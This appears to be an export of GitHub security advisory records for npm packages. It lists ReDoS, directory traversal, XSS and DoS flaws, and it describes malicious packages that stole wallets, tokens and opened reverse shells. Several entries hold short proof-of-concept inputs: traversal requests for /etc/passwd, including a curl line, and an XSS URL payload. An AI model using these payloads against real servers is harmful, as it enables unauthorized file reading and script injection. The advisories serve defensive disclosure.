+1.4.0,GHSA-4xf9-pgvv-xx67,2021-09-29T18:16:33Z,2020-09-03T20:27:46Z,,[],Regular Expression Denial of Service in simple-markdown,"Versions of `simple-markdown` prior to 0.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS). The `SimpleMarkdown.defaultInlineParse()` function has significantly degraded performance when parsing inline code blocks.
+
+
+## Recommendation
+
+Upgrade to version 0.5.2 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'simple-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Khan/simple-markdown/issues/71'}, {'type': 'PACKAGE', 'url': 'https://github.com/Khan/simple-markdown'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SIMPLEMARKDOWN-460540'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1147'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m3j9-p4x2-97q6,2023-09-12T19:35:54Z,2020-09-01T17:22:49Z,,['CVE-2017-16120'],Directory Traversal in liyujing,"Affected versions of `liyujing` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'liyujing'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16120'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/liyujing'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/387'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c3m8-x3cg-qm2c,2021-09-29T18:45:07Z,2020-09-03T20:39:53Z,,[],Configuration Override in helmet-csp,"Versions of `helmet-csp` before to 2.9.1 are vulnerable to a Configuration Override affecting the application's Content Security Policy (CSP). The package's browser sniffing for Firefox deletes the `default-src` CSP policy, which is the fallback policy. This allows an attacker to remove an application's default CSP, possibly rendering the application vulnerable to Cross-Site Scripting.
+
+
+## Recommendation
+
+Upgrade to version 2.9.1 or later. Setting the `browserSniff` configuration to `false` in vulnerable versions also mitigates the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'helmet-csp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.2'}, {'fixed': '2.9.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helmetjs/csp/commit/67a69baafa8198a154f0505a0cf0875f76f6186a'}, {'type': 'PACKAGE', 'url': 'https://github.com/helmetjs/csp/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HELMETCSP-469436'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1176'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cvfm-xjc8-f2vm,2020-08-31T19:00:44Z,2020-09-03T15:46:36Z,,[],Denial of Service in @commercial/subtext,"Version 5.1.1 of `@commercial/subtext` is vulnerable to Denial of Service. The Content-Encoding HTTP header parser has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. Because hapi rethrows system errors (as opposed to catching expected application errors), the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to version 5.1.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@commercial/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.1'}, {'fixed': '5.1.2'}]}], 'versions': ['5.1.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1477'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xh8g-j88w-6v59,2021-10-01T20:57:22Z,2020-09-03T19:42:16Z,,[],Malicious Package in cionstring,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'cionstring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1381'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q9wr-gcjc-hq52,2020-08-31T18:55:23Z,2020-09-04T15:12:13Z,,[],Prototype Pollution in reggae,"All versions of `reggae` are vulnerable to prototype pollution. The function `set` does not restrict the modification of an Object's prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'reggae'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1331'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h24p-2c3m-5qf4,2021-10-01T16:14:52Z,2020-09-03T23:23:23Z,,[],Malicious Package in owl-orchard-apple-sunshine,"All versions of `owl-orchard-apple-sunshine` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'owl-orchard-apple-sunshine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1307'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5947-m4fg-xhqg,2020-08-31T18:46:11Z,2020-09-03T18:08:10Z,,[],Prototype Pollution in lodash.mergewith,"Versions of `lodash.mergewith` before 4.6.1 are vulnerable to Prototype Pollution. The function 'mergeWith' may allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+Update to version 4.6.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lodash.mergewith'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1069'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m4vv-p6fq-jhqp,2021-09-23T21:48:53Z,2020-09-01T19:04:07Z,,[],Directory Traversal in @vivaxy/here,"The @vivaxy/here module is a small web server that serves files with the process' working directory acting as the web root.
+
+It is vulnerable to a directory traversal attack.
+
+This means that files on the local file system which exist outside of the web root may be disclosed to an attacker. This might include confidential files.
+
+Mitigating Factors:
+If the node process is run as a user with very limited filesystem permissions, there is significantly less risk of exposing confidential/private information.
+
+
+Proof of Concept:
+```
+curl ""http://${SERVER_IP}:${SERVER_PORT}/..%2f..%2fetc/passwd""
+```
+
+
+## Recommendation
+
+Run `npm i @vivaxy/here` to install the latest version that addresses this vulnerability.",[],"[{'package': {'ecosystem': 'npm', 'name': '@vivaxy/here'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.2.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/vivaxy/here/commit/298dbab41344dfb7f95f66b1fa7b5cfb436bd4a2'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/296254'}, {'type': 'PACKAGE', 'url': 'https://github.com/vivaxy/here'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/557'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:27:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-77q4-m83q-w76v,2021-09-24T20:59:15Z,2020-09-01T21:18:20Z,,['CVE-2018-14730'],Missing Origin Validation in browserify-hmr,"Versions of `browserify-hmr` prior to 0.4.0 are missing origin validation on the websocket server.
+
+This vulnerability allows a remote attacker to steal a developer's source code because the origin of requests to the websocket server that is used for Hot Module Replacement (HMR) are not validated.
+
+
+## Recommendation
+
+Upgrade to version 0.4.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'browserify-hmr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-14730'}, {'type': 'WEB', 'url': 'https://github.com/AgentME/browserify-hmr/issues/41'}, {'type': 'WEB', 'url': 'https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages'}, {'type': 'WEB', 'url': 'https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages)'}, {'type': 'PACKAGE', 'url': 'https://github.com/AgentME/browserify-hmr'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/726'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:33:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mf7c-58q5-7v65,2021-01-14T15:56:03Z,2020-09-01T16:15:28Z,,['CVE-2016-10695'],Downloads Resources over HTTP in npm-test-sqlite3-trunk,"Affected versions of `npm-test-sqlite3-trunk` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `npm-test-sqlite3-trunk`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",[],"[{'package': {'ecosystem': 'npm', 'name': 'npm-test-sqlite3-trunk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10695'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/297'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-36rh-ggpr-j3gj,2022-08-11T13:19:15Z,2020-09-14T16:38:40Z,,[],Renovate vulnerable to Azure DevOps token leakage in logs,"### Impact
+
+Applies to Azure DevOps users only. The bot's token may be exposed in server or pipeline logs due to the `http.extraheader=AUTHORIZATION` parameter being logged without redaction. It is recommended that Azure DevOps users revoke their existing bot credentials and generate new ones after upgrading if there's a potential that logs have been saved to a location that others can view.
+
+### Patches
+
+Fixed in
+
+### Workarounds
+
+Do not share Renovate logs with anyone who cannot be trusted with access to the token.
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'renovate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.180.0'}, {'fixed': '23.25.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/renovatebot/renovate/security/advisories/GHSA-36rh-ggpr-j3gj'}, {'type': 'PACKAGE', 'url': 'https://github.com/renovatebot/renovate'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-14T16:38:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8c8c-4vfj-rrpc,2022-03-04T22:02:50Z,2020-09-01T19:05:11Z,,[],Reflected Cross-Site Scripting in redis-commander,"Affected versions of `redis-commander` contain a cross-site scripting vulnerability in the `highlighterId` paramter of the clipboard.swf component on hosts serving Redis Commander.
+
+Mitigating factors:
+Flash must be installed / enabled for this to work. The below proof of concept was verified to work using Firefox 57.0 on Windows 10 by manually installing the [Flash NPAPI Windows plugin](https://get.adobe.com/flashplayer/otherversions/)
+
+## Proof of concept
+
+```
+http://instance/jstree/_docs/syntax/clipboard.swf?highlighterId=\%22))}%20catch(e)%20{alert(document.domain);}//
+```
+
+
+## Recommendation
+
+No direct patch for this vulnerability is currently available.
+
+At this time, the best mitigation is to use an alternative, functionally equivalent package, or to use extreme caution when using redis-commander, ensuring that redis-commmander is the only web page you have open, and avoiding clicking on any links.",[],"[{'package': {'ecosystem': 'npm', 'name': 'redis-commander'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/joeferner/redis-commander/commit/1a483ebb3a706cf199dd283cf0aead96606adb14'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/296377'}, {'type': 'PACKAGE', 'url': 'https://github.com/joeferner/redis-commander'}, {'type': 'WEB', 'url': 'https://github.com/joeferner/redis-commander/releases/tag/v0.5.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/562'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:27:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cr4x-w2v7-4mmf,2021-09-29T21:36:13Z,2020-09-03T22:26:13Z,,[],Malicious Package in bufver-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bufver-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1265'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c7pp-x73h-4m2v,2021-09-27T15:43:19Z,2020-09-02T15:53:46Z,,[],Cross-Site Scripting in bootstrap-vue,"Versions of `bootstrap-vue` prior to 2.0.0-rc.12 are vulnerable to Cross-Site Scripting. Due to insufficient input sanitization, components may be vulnerable to Cross-Site Scripting through the `options` variable. This may lead to the execution of malicious JavaScript on the user's browser.
+
+
+## Recommendation
+
+Upgrade to version 2.0.0-rc.12 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bootstrap-vue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0-rc.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.0-rc.11'}}]","[{'type': 'WEB', 'url': 'https://github.com/bootstrap-vue/bootstrap-vue/issues/1974'}, {'type': 'WEB', 'url': 'https://github.com/bootstrap-vue/bootstrap-vue/pull/2134'}, {'type': 'WEB', 'url': 'https://github.com/bootstrap-vue/bootstrap-vue/commit/ba6f3f8359e257589d744f180312c09bf9f12289'}, {'type': 'PACKAGE', 'url': 'https://github.com/bootstrap-vue/bootstrap-vue'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/770'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:35:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9vrw-m88g-w75q,2020-08-31T19:00:40Z,2020-09-03T15:45:53Z,,[],Denial of Service in @hapi/accept,"Versions of `@hapi/accept` prior to 3.2.4 or 5.0.1 are vulnerable to Denial of Service. The Accept-Encoding HTTP header parser has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. Because hapi rethrows system errors (as opposed to catching expected application errors), the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to version 3.2.4 or 5.0.1.",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/accept'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@hapi/accept'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '5.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1475'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5x8q-gj67-rhf2,2021-09-30T21:23:24Z,2020-09-02T21:18:33Z,,[],Malicious Package in discord_debug_log,"All versions of `discord_debug_log` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts.
+
+
+## Recommendation
+
+Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'discord_debug_log'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/873'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xgf5-5gjr-4hjq,2023-09-07T20:42:22Z,2020-09-01T18:15:20Z,,['CVE-2017-16201'],Directory Traversal in zjjserver,"Affected versions of `zjjserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'zjjserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16201'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/zjjserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/427'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qhf6-vqq9-q2p7,2023-09-07T00:11:06Z,2020-09-01T16:58:58Z,,['CVE-2017-16108'],Directory Traversal in gaoxiaotingtingting,"Affected versions of `gaoxiaotingtingting` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'gaoxiaotingtingting'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16108'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/static-html-server'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/377'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r3xc-47qg-h929,2021-09-28T17:38:45Z,2020-09-03T17:06:09Z,,[],Cross-Site Scripting in @ionic/core,"Versions of `@ionic/core` prior to 4.0.3, 4.1.3, 4.2.1 or 4.3.1 are vulnerable to Cross-Site Scripting (XSS). The package uses the unsafe `innerHTML` function without sanitizing input, which may allow attackers to execute arbitrary JavaScript on the victim's browser. This issue affects the components:
+- `.message`
+- `.placeholder`
+- `.loadingText`
+- `.pullingText`
+- `.refershingText`
+
+
+## Recommendation
+
+- If you are using @ionic/core 4.0.x, upgrade to 4.0.3 or later.
+- If you are using @ionic/core 4.1.x, upgrade to 4.1.3 or later.
+- If you are using @ionic/core 4.2.x, upgrade to 4.2.1 or later.
+- If you are using @ionic/core 4.3.x, upgrade to 4.3.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@ionic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@ionic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@ionic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@ionic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ionic-team/ionic/issues/18065'}, {'type': 'PACKAGE', 'url': 'https://github.com/ionic-team/ionic'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1023'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-74f5-4m28-gq5c,2023-09-11T23:15:12Z,2020-09-01T18:09:59Z,,['CVE-2017-16214'],Directory Traversal in peiserver,"Affected versions of `peiserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'peiserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16214'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/peiserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/420'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4f9m-pxwh-68hg,2021-09-28T16:57:07Z,2020-09-11T21:20:14Z,,[],Cross-Site Scripting in swagger-ui,"Versions of `swagger-ui` prior to 3.20.9 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize URLs used in the OAuth auth flow, which may allow attackers to execute arbitrary JavaScript.
+
+
+## Recommendation
+
+Upgrade to version 3.20.9 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.20.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/pull/5190'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SWAGGERUI-449921'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/976'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gfjr-xqhm-qvv3,2021-10-01T14:01:11Z,2020-09-02T20:16:09Z,,[],Malicious Package in aysnc,"All versions of `aysnc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aysnc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/848'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-76xq-58hj-vwm2,2021-09-30T22:06:07Z,2020-09-11T21:16:59Z,,[],Malicious Package in test-module-a,"All versions of `test-module-a` contain malicious code as a preinstall script. The package fetches all names of npm packages owned by the user and attempts to add another maintainer to every package as a means of package hijacking,
+
+
+## Recommendation
+
+Remove the package from your system. If you own any packages that were compromised please contact npm security immediately at security@npmjs.com. Also enable 2FA for publishing to further secure packages you maintain.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'test-module-a'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/929'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-95hx-62rh-gg96,2022-10-05T14:46:27Z,2020-09-15T17:34:17Z,,['CVE-2020-15178'],Potential XSS injection In PrestaShop contactform,"### Impact
+An attacker is able to inject javascript while using the contact form.
+
+### Patches
+The problem is fixed in v4.3.0
+
+### References
